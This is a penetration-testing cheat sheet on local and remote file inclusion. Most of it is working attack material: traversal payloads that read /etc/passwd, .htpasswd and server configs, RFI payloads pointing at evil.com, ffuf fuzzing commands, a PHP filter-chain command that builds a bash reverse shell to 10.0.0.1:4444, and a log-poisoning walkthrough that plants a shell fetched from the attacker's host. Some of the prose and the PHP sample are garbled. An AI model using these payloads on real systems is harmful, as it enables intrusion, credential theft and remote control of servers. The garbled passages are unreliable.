FILE INCLUSION (LFI/RFI)

The intent of this document is to help penetration testers and students identify and test LFI vulnerabilities on future penetration testing engagements by consolidating research for local file inclusion LFI testing techniques. LFI vulnerabilities are typically discovered during web app pen tests using the techniques contained within this document. Additionally, some of the techniques mentioned in this paper are also commonly used in CTF style competitions.

Local File Inclusion (LFI) and Remote File Inclusion (RFI) are vulnerabilities that are often found to affect web applications that rely on a scripting run time.

Local File Inclusion (LFI)

Payload

?page=../
?page=/etc/passwd
?page=../../../../etc/passwd
?page=../../../../../etc/passwd
?page=..//..//..//..//..//etc/passwd
?page=....//....//....//....//etc/passwd
?page=....//....//....//....//....//....//etc/passwd
?page=../../../../../../../../../../../../../../etc/passwd
?page=..\/..\/..\/..\/etc/passwd
?page=..%2F..%2F..%2F..%2Fetc/passwd
?page=..%5C..%5C..%5C..%5cetc/passwd
?page=..%252f..%252f..%252f..%252fetc/passwd
?page=/etc/passwd&
?page=/etc/passwd%00
?page=/etc/passwd%00.inc
?page=/etc/passwd%00.php
?page=http://localhost/index
?page=http:%5c%5cindex
?page=http:%252f%252findex
?page=somedir/../../../../etc/passwd&ext=

# File scheme
?page=file:///etc/passwd
?page=file:%2F%2F%2Fetc%2Fpasswd
?page=file:%252F%252F%252Fetc%252Fpasswd
?page=file%3A///etc/passwd
?page=file%3A%2F%2F%2Fetc%2Fpasswd
?page=file%3A%252F%252F%252Fetc%252Fpasswd
?page=file://var/www/html/index.php
?page=file://var/www/<subdomain>/index.php

# Host
?page=/etc/hosts
# Cron
?page=/etc/crontab

# Web root
?page=/var/www/html/index.html
?page=/var/www/html/index.php
?page=/var/www/example.com/index.php
?page=/var/www/sudomain/index.php
?page=/var/www/wordpress/index.php

# Apache
?page=/etc/apache2/sites-enabled/000-default.conf
?page=/etc/apache2/sites-enabled/domain.conf
?page=/etc/apache2/sites-enabled/example.com.conf
?page=/etc/apache2/sites-enabled/sub.example.com.conf
?page=/etc/apache2/sites-enabled/sub.conf
?page=/etc/apache2/sites-available/domain.conf
?page=/etc/apache2/sites-available/example.com.conf
?page=/etc/apache2/sites-available/sub.example.com.conf
?page=/etc/apache2/sites-available/sub.conf
?page=/etc/apache2/.htpasswd
?page=/var/log/apache/access.log
?page=/var/log/apache/error.log
?page=/var/log/apache2/access.log
?page=/var/log/apache2/error.log

# Nginx
?page=/var/log/nginx/access.log
?page=/var/log/nginx/error.log
?page=/etc/nginx/nginx.conf
?page=/etc/nginx/conf.d/.htpasswd
?page=/etc/nginx/sites-available/example.com.conf
?page=/etc/nginx/sites-enabled/example.com.conf
?page=/usr/local/nginx/conf/nginx.conf
?page=/usr/local/etc/nginx/nginx.conf

# PHP web conf
?page=/etc/php/x.x/apache2/php.ini
?page=/etc/php/x.x/cli/php.ini
?page=/etc/php/x.x/fpm/php.ini

# PHP Filter
?page=php://filter/resource=/etc/passwd
?page=php://filter/read=string.rot13/resource=index.php
?page=php://filter/convert.base64-encode/resource=index.php
?page=pHp://filter/convert.base64-encode/resource=index.php
?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
?page=data://text/plain,<?php echo base64_encode(file_get_contents(“index.php”)); ?>

# Windows
?page=../../../../../../../../windows/system32/drivers/etc/hosts
?page=C:/Windows/System32/drivers/etc/hosts
?page=C:/Users/Public/Desktop/desktop.ini
?page=C:/Users/FUZZ/Desktop/desktop.ini # user enumeration
?page=C:/inetpub/wwwroot/
?page=C:/xampp/apache/conf/httpd.conf
?page=C:/xampp/apache/conf/extra/httpd-userdir.conf
?page=C:/xampp/apache/conf/extra/httpd-vhosts.conf
?page=C:/xampp/apache/conf/extra/httpd-xampp.conf
?page=C:/xampp/apache/conf/extra/httpd-ajp.conf
?page=C:/xampp/apache/logs/access.log
?page=C:/xampp/apache/logs/error.log
?page=C:/xampp/cgi-bin/example.cgi
?page=C:/xampp/htdocs/example.com/index.php
?page=C:/xampp/htdocs/sub.example.com/index.php
?page=C:/xampp/phpMyAdmin/index.php
?page=C:/xampp/phpMyAdmin/config.inc.php

Automation

ffuf -u http://example.com/?page=FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
ffuf -u http://example.com/?page=FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt

As with many exploits, remote and local file inclusions are only a problem at the end of the encoding. Of course, it takes a second person to have it. Now, this article will hopefully give you an idea of protecting your website and most importantly your code from a file inclusion exploit. I’ll give code examples in PHP format.

Let’s look at some of the code that makes RFI / LFI exploits possible.

<a href=index.php?page=file1.php> Files </a>
<? Php
$ page = $ _GET [page];
include ($ page);
?>

Remote File Inclusion (RFI)

Payload

?page=//evil.com/exploit
?page=%2F%2fevil.com/exploit
?page=%2C%2Cevil.com/exploit
?page=http://evil.com/exploit
?page=http%3A//evil.com/exploit
?page=http%3A%2F%2Fevil%2Ecom/exploit
?page=http%253A%252F%252Fevil%252Ecom/
?page=test@sub.example.com/

LFI / RFI using wrappers

• Wrapper php://filter

The part php://filter is case insensitive

http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.iconv.utf-8.utf-16/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php

Remote Code Execution (RCE)

php_filter_chain_ generator is CLI that generates payload for PHP filter bypass and allow us to RCE. Below is the payload for reverse shell.

• https://github.com/synacktiv/php_filter_chain_generator

wget https://raw.githubusercontent.com/synacktiv/php_filter_chain_generator/main/php_filter_chain_generator.py
python3 php_filter_chain_generator.py --chain "<?php system('bash -c \"bash -i >& /dev/tcp/10.0.0.1/4444 0>&1\"')?>"

Then copy the output and paste it to the target.

Log Poisoning

1. Check if You Can Access the Apache Log File

# Debian, Ubuntu Linux
/?page=/var/log/apache/access.log
/?page=../../../../var/log/apache/access.log
/?page=/var/log/apache2/access.log
/?page=../../../../var/log/apache2/access.log

# FreeBSD Linux
/?page=/var/log/httpd-access.log
/?page=../../../../var/log/httpd-access.log

# CentOS, Fedora, RedHat Linux
/?page=/var/log/httpd/access_log
/?page=../../../../var/log/httpd/access_log

1. Prepare the Payload for PHP Reverse Shell

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php

# Edit the values in the payload
$ip = '<attacker-ip>';
$port = 4444;

1. Open Web Server in Local Machine

python -m http.server 80

1. Inject PHP Payload in the User-Agent Send the GET Request with abusing the User-Agent.

The payload can be uploaded to the /shell.php of the target website.

GET / HTTP/1.1
...
User-Agent: <?php file_put_contents('shell.php', file_get_contents('http://<attacker-ip>/shell.php'));  ?>

1. Apply the Injection

Refresh the page /index.php?page=../../../../var/log/apache2/access.log

1. Open Listener for Reverse Shell In you local machine, open the listener. You need to specify the port which you set the section 2.

nc -lvnp 4444

1. Gain Access to Shell

Access to /shell.php of the target website. If it goes well, you can get a shell.

Disclaimer

Exploit Notes are only for educational purpose or penetration testing, not attacking servers that you're not authorized. This site will not take any responsibility even if you attack the server illegally or cause damage unintentionally. Please use the contents in this site at your own risk.
The contents of this site are not original, but based on the information on the internet, the author actually tried and functioned. Although the author strives to post the latest information on the content of this site as much as possible, there is no guarantee that it will always be new.